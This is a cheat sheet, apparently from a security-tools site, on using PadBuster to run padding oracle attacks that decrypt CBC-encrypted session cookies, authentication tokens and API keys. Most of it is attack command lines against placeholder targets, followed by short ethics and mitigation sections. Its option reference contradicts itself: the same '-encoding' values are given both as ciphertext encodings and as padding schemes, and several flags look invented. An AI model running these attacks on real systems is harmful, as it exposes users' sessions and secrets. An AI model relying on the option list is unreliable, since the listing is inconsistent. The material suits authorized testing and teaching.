콘텐츠로 이동
1337skills 1337skills - 치트시트

PadBuster

PadBuster is an automated padding oracle attack tool designed to exploit padding oracle vulnerabilities in applications using CBC-mode encryption. It demonstrates how flawed error handling can leak information about encrypted data through timing and error messages, allowing attackers to decrypt ciphertext without knowing the encryption key.

Installation

섹션 제목: “Installation”

Linux Installation

섹션 제목: “Linux Installation”
# Install Perl (PadBuster requirement)
sudo apt-get install perl libwww-perl

# Download PadBuster
wget http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl

# Set execute permissions
chmod +x padbuster.pl

# Verify installation
perl padbuster.pl

macOS Installation

섹션 제목: “macOS Installation”
# Ensure Perl is installed
perl -v

# Install required Perl modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies

# Download PadBuster
curl -O http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl
chmod +x padbuster.pl

Perl Module Dependencies

섹션 제목: “Perl Module Dependencies”
# Install required modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies
cpan install URI::URL

# Or via CPAN batch
perl -MCPAN -e 'install "LWP::UserAgent"'
perl -MCPAN -e 'install "HTTP::Cookies"'

Core Concepts

섹션 제목: “Core Concepts”

Padding Oracle Vulnerability

섹션 제목: “Padding Oracle Vulnerability”

A padding oracle occurs when an application:

  • Encrypts data using CBC-mode cipher
  • Returns different error messages for valid vs. invalid padding
  • Allows attackers to observe these differences (timing or response)
  • Creates an information leak exploitable for decryption

Attack Mechanics

섹션 제목: “Attack Mechanics”
  • Attacker observes valid vs. invalid padding responses
  • Systematically modifies ciphertext bytes
  • Observes oracle feedback to deduce plaintext
  • Decrypts one block at a time
  • Requires no key knowledge

Assumptions

섹션 제목: “Assumptions”
  • Application reveals padding validity through errors or timing
  • CBC-mode encryption is used
  • Attacker can submit arbitrary ciphertexts
  • Response differences are observable and consistent

Basic Usage

섹션 제목: “Basic Usage”

Simple Padding Oracle Attack

섹션 제목: “Simple Padding Oracle Attack”
# Basic attack on encrypted cookie
perl padbuster.pl \
  http://target.example.com/ \
  6E7CB7C98FDB35A02ABD3D30E3A9B4B8 \
  8 \
  -cookies "AUTH=ABCD1234"

# Explain parameters
# URL: target application
# Ciphertext: encrypted data to decrypt
# Block size: cipher block size (8 for DES, 16 for AES)
# -cookies: include cookies in requests

Specify Proxy and User Agent

섹션 제목: “Specify Proxy and User Agent”
perl padbuster.pl \
  http://target.example.com/app \
  encrypted_cookie_value \
  16 \
  -proxy http://127.0.0.1:8080 \
  -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Verbose Output

섹션 제목: “Verbose Output”
# Maximum verbosity
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -verbose

# Debug mode
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -debug

Target Identification

섹션 제목: “Target Identification”

Identify Vulnerable Parameters

섹션 제목: “Identify Vulnerable Parameters”
# Test cookie-based encryption
perl padbuster.pl \
  http://target.example.com/ \
  cookie_ciphertext \
  16 \
  -cookies "SESSION=ABC123"

# Test URL parameter encryption
perl padbuster.pl \
  http://target.example.com/view?data=ciphertext \
  ciphertext \
  16 \
  -parameter data

Determine Block Size

섹션 제목: “Determine Block Size”
# Manual block size detection
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_data \
  8 \
  -test

# Try common block sizes: 8 (DES), 16 (AES), 24 (3DES)
perl padbuster.pl http://target.example.com/ data 8 -test
perl padbuster.pl http://target.example.com/ data 16 -test

Identify Padding Scheme

섹션 제목: “Identify Padding Scheme”
# Standard PKCS#7 padding (default)
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16

# PKCS#5 padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 0

# NULL padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 2

Attack Execution

섹션 제목: “Attack Execution”
섹션 제목: “Attack Encrypted Cookie”
# Decrypt session cookie
perl padbuster.pl \
  http://target.example.com/ \
  F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B \
  16 \
  -cookies "SESSION=F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B" \
  -encoding 1

# Specify only target parameter
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_value \
  16 \
  -cookies "AUTH=ABC;ID=12345" \
  -parameter-cookie AUTH

Attack Query Parameters

섹션 제목: “Attack Query Parameters”
# Decrypt URL parameter
perl padbuster.pl \
  http://target.example.com/app?id=ABCD1234&user=encrypted_here \
  encrypted_value \
  16 \
  -parameter user

# Multiple parameters
perl padbuster.pl \
  http://target.example.com/app?data=value \
  value \
  16 \
  -parameter data \
  -url "http://target.example.com/app?data=[PLACEHOLDER]"

Attack POST Data

섹션 제목: “Attack POST Data”
# Decrypt POST body parameter
perl padbuster.pl \
  http://target.example.com/submit \
  encrypted_value \
  16 \
  -method POST \
  -parameter payload

# Custom POST data
perl padbuster.pl \
  http://target.example.com/login \
  encrypted_credentials \
  16 \
  -method POST \
  -data "username=admin&encrypted=VALUE" \
  -parameter encrypted

Advanced Options

섹션 제목: “Advanced Options”

Custom Encoding

섹션 제목: “Custom Encoding”
# Hex encoding (default)
perl padbuster.pl \
  http://target.example.com/ \
  hex_ciphertext \
  16 \
  -encoding 1

# Base64 encoding
perl padbuster.pl \
  http://target.example.com/ \
  base64_ciphertext \
  16 \
  -encoding 0

# URL encoding
perl padbuster.pl \
  http://target.example.com/ \
  url_encoded_ciphertext \
  16 \
  -encoding 2

Response Analysis

섹션 제목: “Response Analysis”
# Look for specific error string
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

# Response length analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption Failed"

# Response time analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Proxy Configuration

섹션 제목: “Proxy Configuration”
# Burp Suite proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -proxycreds username:password

# SOCKS proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy socks5://127.0.0.1:9050

Custom Headers

섹션 제목: “Custom Headers”
# Add authorization header
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token123"

# Multiple headers
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token" \
  -header "X-Custom-Header: value"

Decryption Workflow

섹션 제목: “Decryption Workflow”

Stage 1: Determine Block Size

섹션 제목: “Stage 1: Determine Block Size”
# Send increasingly longer plaintexts
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  8 \
  -test  # Try block size 8 first

# If fails, try:
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test  # Try block size 16 (AES)

Stage 2: Identify Padding Error

섹션 제목: “Stage 2: Identify Padding Error”
# Request should produce padding error
perl padbuster.pl \
  http://target.example.com/ \
  corrupted_ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

Stage 3: Execute Attack

섹션 제목: “Stage 3: Execute Attack”
# Run full decryption
perl padbuster.pl \
  http://target.example.com/ \
  full_ciphertext \
  16 \
  -cookies "SESSION=full_ciphertext" \
  -verbose

# Output shows decrypted plaintext block by block

Plaintext Recovery

섹션 제목: “Plaintext Recovery”

Decrypt Entire Message

섹션 제목: “Decrypt Entire Message”
# Attack multiple blocks
perl padbuster.pl \
  http://target.example.com/ \
  8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A \
  16 \
  -cookies "DATA=8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A"

# Automatically decrypts all blocks
# Outputs: Block 1: ... Block 2: ...

Save Decrypted Data

섹션 제목: “Save Decrypted Data”
# Redirect output to file
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -cookies "AUTH=ciphertext" 2>&1 | tee decrypted.txt

# Parse specific blocks
grep "Block " decrypted.txt | cut -d: -f2

Plaintext Analysis

섹션 제목: “Plaintext Analysis”
# Look for structure
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 | grep -E "(Block|admin|user|id)"

# Hex to ASCII conversion
perl padbuster.pl ... | xxd -r -p

Encryption Oracle Bypass

섹션 제목: “Encryption Oracle Bypass”

Test Oracle Responses

섹션 제목: “Test Oracle Responses”
# Send crafted ciphertext
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Observe response patterns
# Success: application processes request
# Failure: padding error message

Modify Ciphertext Bytes

섹션 제목: “Modify Ciphertext Bytes”
# Exploit byte-by-byte feedback
perl padbuster.pl \
  http://target.example.com/ \
  original_ct \
  16 \
  -cookie "ENCRYPTED=original_ct" \
  -verbose

# Attack modifies ciphertext systematically
# Oracle responses reveal plaintext bytes

Attack Scenarios

섹션 제목: “Attack Scenarios”

Decrypt Session Cookies

섹션 제목: “Decrypt Session Cookies”
# Typical web application attack
perl padbuster.pl \
  http://vulnerable.app/dashboard \
  9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A \
  16 \
  -cookies "PHPSESSID=9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A" \
  -encoding 1 \
  -verbose

# Output reveals session data structure
# May contain user ID, role, timestamp

Decrypt Authentication Tokens

섹션 제목: “Decrypt Authentication Tokens”
# JWT or custom token in cookie
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_token \
  16 \
  -cookies "TOKEN=encrypted_token" \
  -parameter-cookie TOKEN

# Reveals token structure and values
# May expose user privileges, identity

Decrypt Configuration Data

섹션 제목: “Decrypt Configuration Data”
# API key or secret in parameter
perl padbuster.pl \
  http://api.example.com/config \
  encrypted_key \
  16 \
  -parameter apikey \
  -method GET \
  -url "http://api.example.com/config?apikey=[PLACEHOLDER]"

Troubleshooting

섹션 제목: “Troubleshooting”

No Successful Decryption

섹션 제목: “No Successful Decryption”
# Verify correct ciphertext format
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test \
  -verbose

# Check block size
for size in 8 16 24 32; do
  perl padbuster.pl http://target.example.com/ ct $size -test 2>/dev/null && echo "Size: $size"
done

Padding Error Not Detected

섹션 제목: “Padding Error Not Detected”
# Specify custom error message
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption" \
  -noerror

# Try timing-based detection
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Connection Issues

섹션 제목: “Connection Issues”
# Use proxy for debugging
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -verbose

# Verify URL is correct
perl padbuster.pl \
  http://target.example.com/vulnerable \
  ciphertext \
  16 \
  -test

Best Practices

섹션 제목: “Best Practices”

Pre-Attack Assessment

섹션 제목: “Pre-Attack Assessment”
  • Verify authorization for testing
  • Identify all encrypted parameters
  • Document baseline encryption behavior
  • Test on non-critical data first
  • Establish scope boundaries

Safe Testing

섹션 제목: “Safe Testing”
# Test on controlled application instance
perl padbuster.pl \
  http://test-server.internal/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Verify behavior matches production
# Document all assumptions about oracle

Mitigation Verification

섹션 제목: “Mitigation Verification”
# After patching, verify attack fails
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test

# Should show no valid decryption path
# Confirms padding oracle is closed
섹션 제목: “Legal and Ethical Considerations”

PadBuster should only be used:

  • On systems you own or have written authorization to test
  • In authorized penetration testing engagements
  • For security research and education
  • In compliance with applicable laws
  • Within clearly defined scope

Always maintain:

  • Written authorization documentation
  • Detailed records of testing activities
  • Proper handling of decrypted sensitive data
  • Professional ethical standards
  • Confidentiality of findings

Resources

섹션 제목: “Resources”
  • Official PadBuster page
  • Padding oracle exploitation guides
  • CBC-mode cipher vulnerability research
  • OWASP cryptography guidelines
  • Academic papers on padding oracles